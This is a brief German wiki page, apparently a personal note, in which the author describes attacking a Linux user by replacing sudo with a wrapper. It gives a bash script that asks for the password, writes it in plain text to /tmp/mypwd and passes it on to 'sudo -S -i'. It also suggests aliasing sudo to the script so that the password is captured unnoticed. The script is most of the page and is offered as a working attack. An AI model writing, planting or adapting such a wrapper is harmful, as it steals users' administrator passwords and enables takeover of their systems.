Benutzer-Werkzeuge

Webseiten-Werkzeuge


mysudo

mysudo

Ich (Nico) hab mir, aufgrund eines Zeitungsartikels, mal gedanken gemacht, wie man auf der Shell ein Linux System angreifen kann. Eine schöne Idee fand ich, den Befehl sudo ein wenig zu modifizieren.

Dabei ist folgender Code entstanden:

#!/bin/bash
echo -n Password:
read -s a
echo
#do something like
echo $a >> /tmp/mypwd
echo $a
echo $a | sudo -S -i

Wenn man das Script speichert und noch einen alias auf sudo anlegt, kann man das Passwort mitlesen.

Nicht perfekt, aber wenn man es nicht genau liest, könnte es funktionieren

mysudo.txt · Zuletzt geändert: 18.02.2010 10:08 von ex